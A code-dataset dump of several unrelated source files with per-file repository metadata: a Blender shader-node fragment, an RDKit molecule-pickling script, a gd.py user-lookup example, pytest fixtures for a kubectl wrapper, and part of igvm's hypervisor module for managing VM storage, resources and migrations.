self.links.new(mult1.outputs[0], add.inputs[0])
self.links.new(self.inputs.outputs["Min"], add.inputs[1])
mult2 = self.addNode("ShaderNodeMath", 3)
mult2.operation = 'MULTIPLY'
self.links.new(self.inputs.outputs["Strength"], mult2.inputs[0])
self.links.new(add.outputs[0], mult2.inputs[1])
self.links.new(mult2.outputs[0], self.outputs.inputs["Height"])
# ---------------------------------------------------------------------
# LIE Group
# ---------------------------------------------------------------------
class LieGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 6)
self.group.inputs.new("NodeSocketVector", "Vector")
self.texco = self.inputs.outputs[0]
self.group.inputs.new("NodeSocketFloat", "Alpha")
self.group.outputs.new("NodeSocketColor", "Color")
def addTextureNodes(self, assets, maps, colorSpace):
texnodes = []
for idx,asset in enumerate(assets):
texnode,isnew = self.addSingleTexture(3, asset, maps[idx], colorSpace)
if isnew:
innode = texnode
mapping = self.mapTexture(asset, maps[idx])
if mapping:
texnode.extension = 'CLIP'
self.links.new(mapping.outputs["Vector"], texnode.inputs["Vector"])
innode = mapping
else:
self.setTexNode(asset.images[colorSpace].name, texnode, colorSpace)
self.links.new(self.inputs.outputs["Vector"], innode.inputs["Vector"])
texnodes.append([texnode])
if texnodes:
nassets = len(assets)
for idx in range(1, nassets):
map = maps[idx]
if map.invert:
inv = self.addNode("ShaderNodeInvert", 4)
node = texnodes[idx][0]
self.links.new(node.outputs[0], inv.inputs["Color"])
texnodes[idx].append(inv)
texnode = texnodes[0][-1]
alphamix = self.addNode("ShaderNodeMixRGB", 6)
alphamix.blend_type = 'MIX'
alphamix.inputs[0].default_value = 1.0
self.links.new(self.inputs.outputs["Alpha"], alphamix.inputs[0])
self.links.new(texnode.outputs["Color"], alphamix.inputs[1])
masked = False
for idx in range(1, nassets):
map = maps[idx]
if map.ismask:
if idx == nassets-1:
continue
mix = self.addNode("ShaderNodeMixRGB", 5) # ShaderNodeMixRGB
mix.blend_type = 'MULTIPLY'
mix.use_alpha = False
mask = texnodes[idx][-1]
self.setColorSpace(mask, 'NONE')
self.links.new(mask.outputs["Color"], mix.inputs[0])
self.links.new(texnode.outputs["Color"], mix.inputs[1])
self.links.new(texnodes[idx+1][-1].outputs["Color"], mix.inputs[2])
texnode = mix
masked = True
elif not masked:
mix = self.addNode("ShaderNodeMixRGB", 5)
alpha = setMixOperation(mix, map)
mix.inputs[0].default_value = alpha
node = texnodes[idx][-1]
base = texnodes[idx][0]
if alpha != 1:
node = self.multiplyScalarTex(alpha, base, 4, "Alpha")
self.links.new(node.outputs[0], mix.inputs[0])
elif "Alpha" in base.outputs.keys():
self.links.new(base.outputs["Alpha"], mix.inputs[0])
else:
print("No LIE alpha:", base)
mix.inputs[0].default_value = alpha
mix.use_alpha = True
self.links.new(texnode.outputs["Color"], mix.inputs[1])
self.links.new(texnodes[idx][-1].outputs["Color"], mix.inputs[2])
texnode = mix
masked = False
else:
masked = False
self.links.new(texnode.outputs[0], alphamix.inputs[2])
self.links.new(alphamix.outputs[0], self.outputs.inputs["Color"])
def mapTexture(self, asset, map):
if asset.hasMapping(map):
data = asset.getMapping(self.material, map)
return self.addMappingNode(data, map)
def setMixOperation(mix, map):
alpha = 1
op = map.operation
alpha = map.transparency
if op == "multiply":
mix.blend_type = 'MULTIPLY'
useAlpha = True
elif op == "add":
mix.blend_type = 'ADD'
useAlpha = False
elif op == "subtract":
mix.blend_type = 'SUBTRACT'
useAlpha = False
elif op == "alpha_blend":
mix.blend_type = 'MIX'
useAlpha = True
else:
print("MIX", asset, map.operation)
return alpha
| 43.742744 | 126 | 0.594626 | 3,675 | 33,157 | 5.307755 | 0.106395 | 0.070132 | 0.092894 | 0.054957 | 0.647698 | 0.574541 | 0.505383 | 0.440121 | 0.36558 | 0.331744 | 0 | 0.016745 | 0.19851 | 33,157 | 757 | 127 | 43.800528 | 0.717253 | 0.134089 | 0 | 0.32948 | 0 | 0 | 0.14683 | 0.013939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088632 | false | 0 | 0.007707 | 0.001927 | 0.148362 | 0.003854 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f863b4274290ea62902a6d00d749f166e4d688 | 847 | py | Python | CSD_sdf_to_p.py | Snigdha-Agarwal/dl4chem-geometry | 6b025ad27a63c814d07c7c30118587236388d61d | [
"BSD-3-Clause"
] | 59 | 2019-04-01T00:40:59.000Z | 2021-08-28T05:34:26.000Z | CSD_sdf_to_p.py | Snigdha-Agarwal/dl4chem-geometry | 6b025ad27a63c814d07c7c30118587236388d61d | [
"BSD-3-Clause"
] | 2 | 2019-07-08T01:49:37.000Z | 2019-11-09T21:30:19.000Z | CSD_sdf_to_p.py | Snigdha-Agarwal/dl4chem-geometry | 6b025ad27a63c814d07c7c30118587236388d61d | [
"BSD-3-Clause"
] | 16 | 2019-04-01T03:05:54.000Z | 2021-08-23T13:56:46.000Z | import numpy as np
import pickle
from rdkit import Chem
n_min = 2
n_max = 50
smilist, mollist = [], []
suppl = Chem.SDMolSupplier('CSD.sdf')
j = 0
k = 0
for i, mol in enumerate(suppl):
try:
Chem.rdmolops.AssignAtomChiralTagsFromStructure(mol)
Chem.rdmolops.AssignStereochemistry(mol)
smiles = Chem.MolToSmiles(mol, isomericSmiles=True)
na = mol.GetNumHeavyAtoms()
pos = mol.GetConformer().GetPositions()
if na==pos.shape[0] and na>=n_min and na<=n_max:
smilist.append(smiles)
mollist.append(mol)
j += 1
k += 1
except:
continue
print('j = {}'.format(j))
print('k = {}'.format(k))
print('i = {}'.format(i))
smilist=np.array(smilist)
mollist=np.array(mollist)
with open('CSD_molset_all.p','wb') as f:
pickle.dump([mollist, smilist], f)
| 25.666667 | 60 | 0.623377 | 114 | 847 | 4.578947 | 0.508772 | 0.015326 | 0.022989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012289 | 0.231405 | 847 | 32 | 61 | 26.46875 | 0.789555 | 0 | 0 | 0 | 0 | 0 | 0.050767 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f8b882a8802eba9c921df2a8d47a816b7b3760 | 856 | py | Python | examples/get_id.py | scottwedge/gd.py | 328c9833abc949b1c9ac0eabe276bd66fead4c2c | [
"MIT"
] | null | null | null | examples/get_id.py | scottwedge/gd.py | 328c9833abc949b1c9ac0eabe276bd66fead4c2c | [
"MIT"
] | null | null | null | examples/get_id.py | scottwedge/gd.py | 328c9833abc949b1c9ac0eabe276bd66fead4c2c | [
"MIT"
] | null | null | null | """Simple example showing user searching.
Author: NeKitDS
"""
import asyncio
import gd
client = gd.Client()
async def main():
# get some input from user
name = input("Enter your GD nickname: ")
# look up and print IDs if found
try:
user = await client.find_user(name)
if not user.is_registered():
print(f"Hey there, {user.name}! Seems like you are unregistered...".format(user))
else:
print(
f"Hello, {user.name}! Your AccountID is {user.account_id} "
f"and PlayerID is {user.id}."
)
# could not find
except gd.MissingAccess:
print(f"Sorry, could not find user with name {name}...")
# let us wait a bit before exiting
await asyncio.sleep(3)
# run a program
client.run(main())
| 22.526316 | 94 | 0.571262 | 111 | 856 | 4.378378 | 0.594595 | 0.065844 | 0.049383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00173 | 0.324766 | 856 | 37 | 95 | 23.135135 | 0.8391 | 0.202103 | 0 | 0 | 0 | 0 | 0.330709 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f9824cbd16d97852ba84f6a02c0f9fcb8e78c9 | 1,440 | py | Python | tests/kubectl/conftest.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | 2 | 2021-05-14T22:00:55.000Z | 2021-09-17T20:09:17.000Z | tests/kubectl/conftest.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | null | null | null | tests/kubectl/conftest.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | 1 | 2021-07-16T08:35:43.000Z | 2021-07-16T08:35:43.000Z | from unittest.mock import MagicMock, patch
import pytest
from klander_core.kubectl import _build_cmd as original_build_cmd
@pytest.fixture
def mock_fake_proc(request):
fake_proc = MagicMock()
marker = request.node.get_closest_marker('proc_exit_code')
if marker is None:
fake_proc.wait.return_value = 0
else:
fake_proc.wait.return_value = marker.args[0]
yield fake_proc
@pytest.fixture
def mock_popen(mock_fake_proc):
with patch('klander_core.kubectl.subprocess.Popen') as MockPopen:
MockPopen.return_value = mock_fake_proc
yield MockPopen
@pytest.fixture
def mock_fake_file(request):
fake_file = MagicMock()
marker = request.node.get_closest_marker('proc_output')
if marker is None:
fake_file.read.return_value = 'hello world'.encode('utf-8')
else:
fake_file.read.return_value = marker.args[0].encode('utf-8')
yield fake_file
@pytest.fixture
def mock_tempfile(mock_fake_file):
with patch('klander_core.kubectl.tempfile.TemporaryFile') as MockTempFile:
context_manager = MagicMock()
context_manager.__enter__.return_value = mock_fake_file
MockTempFile.return_value = context_manager
yield MockTempFile
@pytest.fixture
def mock_build_cmd():
with patch('klander_core.kubectl._build_cmd') as fake_build_cmd:
fake_build_cmd.side_effect = original_build_cmd
yield fake_build_cmd
| 24.827586 | 78 | 0.731944 | 196 | 1,440 | 5.05102 | 0.280612 | 0.064646 | 0.080808 | 0.10101 | 0.366667 | 0.092929 | 0.092929 | 0.092929 | 0 | 0 | 0 | 0.004263 | 0.185417 | 1,440 | 57 | 79 | 25.263158 | 0.839727 | 0 | 0 | 0.236842 | 0 | 0 | 0.109028 | 0.077083 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131579 | false | 0 | 0.078947 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7fe4fbd79fd0b47bea77dc1c37e6c656c380244 | 42,556 | py | Python | igvm/hypervisor.py | innogames/igvm | 6c4bd98d61ebaf6280698e74d560ea5b3d70cd9e | [
"MIT"
] | 14 | 2018-02-15T14:09:54.000Z | 2021-07-19T01:55:58.000Z | igvm/hypervisor.py | innogames/igvm | 6c4bd98d61ebaf6280698e74d560ea5b3d70cd9e | [
"MIT"
] | 129 | 2018-02-19T09:47:18.000Z | 2022-03-02T14:08:10.000Z | igvm/hypervisor.py | innogames/igvm | 6c4bd98d61ebaf6280698e74d560ea5b3d70cd9e | [
"MIT"
] | 10 | 2018-02-16T15:56:59.000Z | 2021-05-14T23:31:31.000Z | """igvm - Hypervisor Model
Copyright (c) 2018 InnoGames GmbH
"""
import logging
import math
from contextlib import contextmanager
from time import sleep, time
from xml.etree import ElementTree
from igvm.vm import VM
from libvirt import VIR_DOMAIN_SHUTOFF
from igvm.drbd import DRBD
from igvm.exceptions import (
ConfigError,
HypervisorError,
InconsistentAttributeError,
InvalidStateError,
RemoteCommandError,
StorageError,
XfsMigrationError,
)
from igvm.host import Host
from igvm.kvm import (
DomainProperties,
generate_domain_xml,
migrate_live,
set_memory,
set_vcpus,
)
from igvm.libvirt import get_virtconn
from igvm.settings import (
HOST_RESERVED_MEMORY_MIB,
IGVM_IMAGE_MD5_URL,
IGVM_IMAGE_URL,
IMAGE_PATH,
KVM_HWMODEL_TO_CPUMODEL,
MIGRATE_CONFIG,
RESERVED_DISK,
VG_NAME,
VM_OVERHEAD_MEMORY_MIB,
XFS_CONFIG,
)
from igvm.transaction import Transaction
from igvm.utils import retry_wait_backoff
from typing import Iterator, Tuple
log = logging.getLogger(__name__)
class Hypervisor(Host):
"""Hypervisor interface."""
servertype = 'hypervisor'
def __init__(self, dataset_obj):
super(Hypervisor, self).__init__(dataset_obj)
if dataset_obj['state'] == 'retired':
raise InvalidStateError(
'Hypervisor "{0}" is retired.'.format(self.fqdn)
)
self._mount_path = {}
self._storage_pool = None
self._storage_type = None
def get_storage_pool(self):
# Store per-VM path information
# We cannot store these in the VM object due to migrations.
if self._storage_pool:
return self._storage_pool
self._storage_pool = self.conn().storagePoolLookupByName(VG_NAME)
return self._storage_pool
def get_storage_type(self):
if self._storage_type:
return self._storage_type
self._storage_type = ElementTree.fromstring(
self.get_storage_pool().XMLDesc()
).attrib['type']
if (
self._storage_type not in HOST_RESERVED_MEMORY_MIB
or self._storage_type not in RESERVED_DISK
):
raise HypervisorError(
'Unsupported storage type {} on hypervisor {}'
.format(self._storage_type, self.dataset_obj['hostname'])
)
return self._storage_type
def get_volume_by_vm(self, vm):
"""Get logical volume information of a VM"""
for vol_name in self.get_storage_pool().listVolumes():
# Match the LV based on the object_id encoded within its name
if vm.match_uid_name(vol_name):
return self.get_storage_pool().storageVolLookupByName(vol_name)
raise StorageError(
'No existing storage volume found for VM "{}" on "{}".'
.format(vm.fqdn, self.fqdn)
)
def vm_lv_update_name(self, vm):
"""Update the VMs logical volumes name
While the object_id part of the lv name will always be the same, the
hostname can get out of date when it's updated on serveradmin. Calling
this method during vm_restart updates it if required.
Be aware: This can only be done when the VM is shut off and the
libvirt domains needs to be redefined afterwards.
"""
old_name = self.get_volume_by_vm(vm).name()
new_name = vm.uid_name
with self.fabric_settings():
if old_name != new_name:
self.run(
'lvrename {} {}'.format(
self.get_volume_by_vm(vm).path(),
vm.uid_name
)
)
self.get_storage_pool().refresh()
def vm_mount_path(self, vm):
"""Returns the mount path for a VM or raises HypervisorError if not
mounted."""
if vm not in self._mount_path:
raise HypervisorError(
'"{}" is not mounted on "{}".'
.format(vm.fqdn, self.fqdn)
)
return self._mount_path[vm]
def get_vlan_network(self, ip_addr):
"""Find the network for the VM
We could not get the "route_network" of the VM because it might have
its IP address changed.
"""
for vlan_network in self.dataset_obj['vlan_networks']:
if ip_addr in vlan_network['intern_ip']:
return vlan_network
return None
def vm_max_memory(self, vm):
"""Calculates the max amount of memory in MiB the VM may receive."""
mem = vm.dataset_obj['memory']
if mem > 12 * 1024:
max_mem = mem + 10 * 1024
else:
max_mem = 16 * 1024
# Never go higher than the hypervisor
max_mem = min(self.total_vm_memory(), max_mem)
return max_mem
def check_vm(self, vm, offline):
"""Check whether a VM can run on this hypervisor"""
# Cheap checks should always be executed first to save time
# and fail early. Same goes for checks that are more likely to fail.
# Immediately check whether HV is even supported.
if not offline:
# Compatbile OS?
os_pair = (vm.hypervisor.dataset_obj['os'], self.dataset_obj['os'])
if os_pair not in MIGRATE_CONFIG:
raise HypervisorError(
'{} to {} migration is not supported online.'
.format(*os_pair))
# Compatible CPU model?
hw_pair = (
vm.hypervisor.dataset_obj['hardware_model'],
self.dataset_obj['hardware_model'],
)
cpu_pair = [
arch
for arch, models in KVM_HWMODEL_TO_CPUMODEL.items()
for model in hw_pair
if model in models
]
if cpu_pair[0] != cpu_pair[1]:
raise HypervisorError(
'{} to {} migration is not supported online.'
.format(*hw_pair)
)
# HV in supported state?
if self.dataset_obj['state'] not in ['online', 'online_reserved']:
raise InvalidStateError(
'Hypervisor "{}" is not in online state ({}).'
.format(self.fqdn, self.dataset_obj['state'])
)
# Enough CPUs?
if vm.dataset_obj['num_cpu'] > self.dataset_obj['num_cpu']:
raise HypervisorError(
'Not enough CPUs. Destination Hypervisor has {0}, '
'but VM requires {1}.'
.format(self.dataset_obj['num_cpu'], vm.dataset_obj['num_cpu'])
)
# Proper VLAN?
if not self.get_vlan_network(vm.dataset_obj['intern_ip']):
raise HypervisorError(
'Hypervisor "{}" does not support route_network "{}".'
.format(self.fqdn, vm.route_network)
)
# Those checks below all require libvirt connection,
# so execute them last to avoid unnecessary overhead if possible.
# Enough memory?
free_mib = self.free_vm_memory()
if vm.dataset_obj['memory'] > free_mib:
raise HypervisorError(
'Not enough memory. '
'Destination Hypervisor has {:.2f} MiB but VM requires {} MiB '
.format(free_mib, vm.dataset_obj['memory'])
)
# Enough disk?
free_disk_space = self.get_free_disk_size_gib()
vm_disk_size = float(vm.dataset_obj['disk_size_gib'])
if vm_disk_size > free_disk_space:
raise HypervisorError(
'Not enough free space in VG {} to build VM while keeping'
' {} GiB reserved'
.format(VG_NAME, RESERVED_DISK[self.get_storage_type()])
)
# VM already defined? Least likely, if at all.
if self.vm_defined(vm):
raise HypervisorError(
'VM "{}" is already defined on "{}".'
.format(vm.fqdn, self.fqdn)
)
def define_vm(self, vm, transaction=None):
"""Creates a VM on the hypervisor."""
log.info('Defining "{}" on "{}"...'.format(vm.fqdn, self.fqdn))
self.conn().defineXML(generate_domain_xml(self, vm))
# Refresh storage pools to register the vm image
for pool_name in self.conn().listStoragePools():
pool = self.conn().storagePoolLookupByName(pool_name)
pool.refresh(0)
if transaction:
transaction.on_rollback(
'delete VM', self.undefine_vm, vm, keep_storage=True
)
def _check_committed(self, vm):
"""Check that the given VM has no uncommitted changes"""
if vm.dataset_obj.is_dirty():
raise ConfigError(
'VM object has uncommitted changes, commit them first!'
)
def _check_attribute_synced(self, vm, attrib):
"""Compare an attribute value in Serveradmin with the actual value on
the hypervisor
"""
synced_values = self.vm_sync_from_hypervisor(vm)
if attrib not in synced_values:
log.warning('Cannot validate attribute "{}"!'.format(attrib))
return
current_value = synced_values[attrib]
if current_value != vm.dataset_obj[attrib]:
raise InconsistentAttributeError(vm, attrib, current_value)
def vm_set_num_cpu(self, vm, num_cpu):
"""Change the number of CPUs of a VM"""
self._check_committed(vm)
self._check_attribute_synced(vm, 'num_cpu')
if num_cpu < 1:
raise ConfigError('Invalid num_cpu value: {}'.format(num_cpu))
log.info(
'Changing #CPUs of "{}" on "{}" from {} to {}...'
.format(vm.fqdn, self.fqdn, vm.dataset_obj['num_cpu'], num_cpu)
)
# If VM is offline, we can just rebuild the domain
if not self.vm_running(vm):
log.info('VM is offline, rebuilding domain with new settings')
vm.dataset_obj['num_cpu'] = num_cpu
self.redefine_vm(vm)
else:
set_vcpus(self, vm, self._get_domain(vm), num_cpu)
# Validate changes
# We can't rely on the hypervisor to provide data on VMs all the time.
updated_dataset_obj = self.vm_sync_from_hypervisor(vm)
current_num_cpu = updated_dataset_obj['num_cpu']
if current_num_cpu != num_cpu:
raise HypervisorError(
'New CPUs are not visible to hypervisor, changes will not be '
'committed.'
)
vm.dataset_obj['num_cpu'] = num_cpu
vm.dataset_obj.commit()
def vm_set_memory(self, vm, memory):
self._check_committed(vm)
vm.check_serveradmin_config()
self._check_attribute_synced(vm, 'memory')
running = self.vm_running(vm)
if running and memory < vm.dataset_obj['memory']:
raise InvalidStateError(
'Cannot shrink memory while VM is running'
)
if self.free_vm_memory() < memory - vm.dataset_obj['memory']:
raise HypervisorError('Not enough free memory on hypervisor.')
log.info(
'Changing memory of "{}" on "{}" from {} MiB to {} MiB'
.format(vm.fqdn, self.fqdn, vm.dataset_obj['memory'], memory)
)
vm.dataset_obj['memory'] = memory
vm.check_serveradmin_config()
# If VM is offline, we can just rebuild the domain
if not running:
log.info('VM is offline, rebuilding domain with new settings')
self.redefine_vm(vm)
vm.dataset_obj.commit()
else:
old_total = vm.meminfo()['MemTotal']
set_memory(self, vm, self._get_domain(vm))
vm.dataset_obj.commit()
# Hypervisor might take some time to propagate memory changes,
# wait until MemTotal changes.
retry_wait_backoff(
lambda: vm.meminfo()['MemTotal'] != old_total,
'New memory is not visible to virtual machine. Note that we '
'can not online decrease the domains memory. The libvirt '
'and serveradmin changes will therefore not be rolled back.',
max_wait=40
)
# Validate changes, if possible.
current_memory = self.vm_sync_from_hypervisor(vm).get('memory', memory)
if current_memory != memory:
raise HypervisorError(
'Warning: The sanity check to see if libvirt reports the '
'updated amount of memory for the domain we just changed has'
'failed. Note that we can not online decrease the domains '
'memory. The libvirt and serveradmin changes will therefore '
'not be rolled back.'
)
def vm_set_disk_size_gib(self, vm, new_size_gib):
"""Changes disk size of a VM."""
if new_size_gib < vm.dataset_obj['disk_size_gib']:
raise NotImplementedError(
'Cannot shrink the disk. '
'Use `igvm migrate --offline --offline-transport xfs '
'--disk-size {} {}`'.format(
new_size_gib, vm.fqdn,
)
)
volume = self.get_volume_by_vm(vm)
if self.get_storage_type() == 'logical':
# There is no resize function in version of libvirt
# available in Debian 9.
self.run('lvresize {} -L {}g'.format(volume.path(), new_size_gib))
self.get_storage_pool().refresh()
else:
raise NotImplementedError(
'Storage volume resizing is supported only on LVM storage!'
)
self._get_domain(vm).blockResize(
'vda',
new_size_gib * 1024 ** 2, # Yes, it is in KiB
)
vm.run('xfs_growfs /')
def create_vm_storage(self, vm, transaction=None, vol_name=None):
"""Allocate storage for a VM. Returns the disk path."""
vol_name = vm.uid_name if vol_name is None else vol_name
volume_xml = """
<volume>
<name>{name}</name>
<allocation unit="G">{size}</allocation>
<capacity unit="G">{size}</capacity>
</volume>
""".format(
name=vol_name,
size=vm.dataset_obj['disk_size_gib'],
)
volume = self.get_storage_pool().createXML(volume_xml, 0)
if volume is None:
raise StorageError(
'Failed to create storage volume {}/{}'.format(
self.get_storage_pool().name(),
vol_name,
)
)
if transaction:
transaction.on_rollback('destroy storage', volume.delete)
# XXX: When building a VM we use the volumes path to format it right
# after creation. Unfortunately the kernel is slow to pick up on zfs
# volume changes and creates the symlink in /dev/zvol/<pool>/ only
# after a moment.
self.run("while [ ! -L '{}' ]; do sleep 1; done".format(volume.path()))
def format_vm_storage(self, vm, transaction=None):
"""Create new filesystem for VM and mount it. Returns mount path."""
if self.vm_defined(vm):
raise InvalidStateError(
'Refusing to format storage of defined VM "{}".'
.format(vm.fqdn)
)
mkfs_options = XFS_CONFIG.get(vm.dataset_obj['os'])
if not mkfs_options:
raise ConfigError(
'No mkfs options defined for OS {}'.format(
vm.dataset_obj['os']
)
)
self.format_storage(self.get_volume_by_vm(vm).path(), mkfs_options)
return self.mount_vm_storage(vm, transaction)
def download_and_extract_image(self, image, target_dir):
"""Download image, verify its checsum and extract it
All operations must be performed with locking, so that parallel
running igvm won't touch eachothers' images.
"""
self.run(
'( '
'set -e ; '
'flock -w 120 9 ; '
'curl -o {img_path}/{img_file}.md5 {md5_url} ; '
'sed -Ei \'s_ (.*/)?([a-zA-Z0-9\.\-]+)$_ {img_path}/\\2_\' '
'{img_path}/{img_file}.md5 ; '
'md5sum -c {img_path}/{img_file}.md5 || '
'curl -o {img_path}/{img_file} {img_url} ; '
'tar --xattrs --xattrs-include=\'*\' -xzf {img_path}/{img_file} '
'-C {dst_path} ;'
') 9>/tmp/igvm_image.lock'.format(
img_path=IMAGE_PATH,
img_file=image,
img_url=IGVM_IMAGE_URL.format(image=image),
md5_url=IGVM_IMAGE_MD5_URL.format(image=image),
dst_path=target_dir,
)
)
def mount_vm_storage(self, vm, transaction=None):
"""Mount VM filesystem on host and return mount point."""
if vm in self._mount_path:
return self._mount_path[vm]
if self.vm_defined(vm) and self.vm_running(vm):
raise InvalidStateError(
'Refusing to mount VM filesystem while VM is powered on'
)
self._mount_path[vm] = self.mount_temp(
self.get_volume_by_vm(vm).path(), suffix=('-' + vm.fqdn)
)
if transaction:
transaction.on_rollback(
'unmount storage', self.umount_vm_storage, vm
)
vm.mounted = True
return self._mount_path[vm]
def umount_vm_storage(self, vm):
"""Unmount VM filesystem."""
if vm not in self._mount_path:
return
self.umount_temp(self._mount_path[vm])
self.remove_temp(self._mount_path[vm])
del self._mount_path[vm]
vm.mounted = False
def vm_sync_from_hypervisor(self, vm):
"""Synchronizes serveradmin information from the actual data on
the hypervisor. Returns a dict with all collected values."""
# Update disk size
result = {}
try:
vol_size = self.get_volume_by_vm(vm).info()[1]
result['disk_size_gib'] = int(math.ceil(vol_size / 1024 ** 3))
except HypervisorError:
raise HypervisorError(
'Unable to find source LV and determine its size.'
)
self._vm_sync_from_hypervisor(vm, result)
return result
def conn(self):
conn = get_virtconn(self.fqdn)
if not conn:
raise HypervisorError(
'Unable to connect to hypervisor "{}"!'
.format(self.fqdn)
)
return conn
def num_numa_nodes(self):
"""Return the number of NUMA nodes"""
return self.conn().getInfo()[4]
def _find_domain(self, vm):
"""Search and return the domain on hypervisor
It is erroring out when multiple domains found, and returning None,
when none found.
"""
found = None
# We are not using lookupByName(), because it prints ugly messages to
# the console.
for domain in self.conn().listAllDomains():
name = domain.name()
# Match the domain based on the object_id encoded in its name
if not vm.match_uid_name(name):
continue
if found is not None:
raise HypervisorError(
'Same VM is defined multiple times as "{}" and "{}".'
.format(found.name(), name)
)
found = domain
return found
def _get_domain(self, vm):
domain = self._find_domain(vm)
if not domain:
raise HypervisorError(
'Unable to find domain "{}" on hypervisor "{}".'
.format(vm.fqdn, self.fqdn)
)
return domain
def vm_block_device_name(self):
"""Get the name of the root file system block device as seen by
the guest OS"""
return 'vda1'
def check_migrate_parameters(
self, vm: VM, offline: bool, offline_transport: str,
disk_size: int = None,
):
if offline_transport not in ['netcat', 'drbd', 'xfs']:
raise StorageError(
'Unknown offline transport method {}!'
.format(offline_transport)
)
if disk_size is None:
return
if disk_size < 1:
raise StorageError('disk_size must be at least 1GiB!')
if not (offline and offline_transport == 'xfs'):
raise StorageError(
'disk_size can be applied only with offline transport xfs!'
)
allocated_space = vm.dataset_obj['disk_size_gib'] - vm.disk_free()
if disk_size < allocated_space:
raise StorageError(
'disk_size is lower than allocated space: {} < {}!'
.format(disk_size, allocated_space)
)
def vm_new_disk_size(
self, vm: VM, offline: bool, offline_transport: str,
disk_size: int = None,
) -> int:
self.check_migrate_parameters(
vm, offline, offline_transport, disk_size
)
if disk_size is None:
return vm.dataset_obj['disk_size_gib']
return disk_size or vm.dataset_obj['disk_size_gib']
def _vm_apply_new_disk_size(
self, vm: VM, offline: bool, offline_transport: str,
transaction: Transaction, disk_size: int = 0,
):
"""
If the new VM disk size is set, checks if it's correct and sufficient
and commit the new size. Rolls it back on the interrupted migration
:param VM vm: The migrating VM
:param str offline_transport: offline migration transport
:param Transaction transaction: The transaction to rollback
:param int disk_size: the new disk_size_gib attribute
"""
size = self.vm_new_disk_size(vm, offline,
offline_transport, disk_size)
if size == vm.dataset_obj['disk_size_gib']:
return
old_size = vm.dataset_obj['disk_size_gib']
vm.dataset_obj['disk_size_gib'] = size
vm.dataset_obj.commit()
if transaction:
def restore_size():
vm.dataset_obj['disk_size_gib'] = old_size
vm.dataset_obj.commit()
transaction.on_rollback('reset_disk_size', restore_size)
def _wait_for_shutdown(
self, vm: VM, no_shutdown: bool, transaction: Transaction,
):
"""
If no_shutdown=True, will wait for the manual VM shutdown. Otherwise
shoutdown the VM.
:param VM vm: The migrating VM
:param bool no_shutdown: if the VM must be shut down manualy
:param Transaction transaction: The transaction to rollback
"""
vm.set_state('maintenance', transaction=transaction)
if vm.is_running():
if no_shutdown:
log.info('Please shut down the VM manually now')
vm.wait_for_running(running=False, timeout=86400)
else:
vm.shutdown(
check_vm_up_on_transaction=False,
transaction=transaction,
)
def migrate_vm(
self, vm: VM, target_hypervisor: 'Hypervisor', offline: bool,
offline_transport: str, transaction: Transaction, no_shutdown: bool,
disk_size: int = 0,
):
self._vm_apply_new_disk_size(
vm, offline, offline_transport, transaction, disk_size
)
if offline:
log.info(
'Starting offline migration of vm {} from {} to {}'.format(
vm, vm.hypervisor, target_hypervisor)
)
target_hypervisor.create_vm_storage(vm, transaction)
if offline_transport == 'drbd':
is_lvm_storage = (
self.get_storage_type() == 'logical'
and target_hypervisor.get_storage_type() == 'logical'
)
if not is_lvm_storage:
raise NotImplementedError(
'DRBD migration is supported only between hypervisors '
'using LVM storage!'
)
host_drbd = DRBD(self, vm, master_role=True)
peer_drbd = DRBD(target_hypervisor, vm)
if vm.hypervisor.vm_running(vm):
vm_block_size = vm.get_block_size('/dev/vda')
src_block_size = vm.hypervisor.get_block_size(
vm.hypervisor.get_volume_by_vm(vm).path()
)
dst_block_size = target_hypervisor.get_block_size(
target_hypervisor.get_volume_by_vm(vm).path()
)
log.debug(
'Block sizes: VM {}, Source HV {}, Destination HV {}'
.format(vm_block_size, src_block_size, dst_block_size)
)
vm.set_block_size('vda', min(
vm_block_size,
src_block_size,
dst_block_size,
))
with host_drbd.start(peer_drbd), peer_drbd.start(host_drbd):
# XXX: Do we really need to wait for the both?
host_drbd.wait_for_sync()
peer_drbd.wait_for_sync()
self._wait_for_shutdown(vm, no_shutdown, transaction)
elif offline_transport == 'netcat':
self._wait_for_shutdown(vm, no_shutdown, transaction)
vm_disk_path = target_hypervisor.get_volume_by_vm(vm).path()
with target_hypervisor.netcat_to_device(vm_disk_path) as args:
self.device_to_netcat(
self.get_volume_by_vm(vm).path(),
vm.dataset_obj['disk_size_gib'] * 1024 ** 3,
args,
)
elif offline_transport == 'xfs':
self._wait_for_shutdown(vm, no_shutdown, transaction)
